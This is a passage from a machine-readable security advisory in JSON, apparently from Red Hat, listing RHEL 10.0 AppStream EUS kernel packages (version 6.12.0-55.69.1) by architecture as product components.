"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
